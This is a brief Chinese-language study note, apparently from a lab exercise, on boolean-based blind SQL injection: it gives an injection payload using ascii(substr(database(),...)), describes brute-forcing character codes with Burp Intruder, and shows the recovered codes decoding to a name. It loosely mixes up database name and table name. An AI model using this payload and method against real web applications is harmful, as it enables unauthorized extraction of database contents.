bool盲注1
一、判断是否存在布尔盲注
二、使用Burp抓包
1、Burp抓包,payload设置1-128,爆破数据库名的长度
url输入如下命令,Burp抓包,设置payload
id=1 and ascii(substr(database(),3,1)) =12
intruder attack启动后,抓取不正常的length的数据,如下,对应ascii码表,可得到数据库的表名
107 97 110 119 111 108 111 110 103 120 105 97
kanwolongxia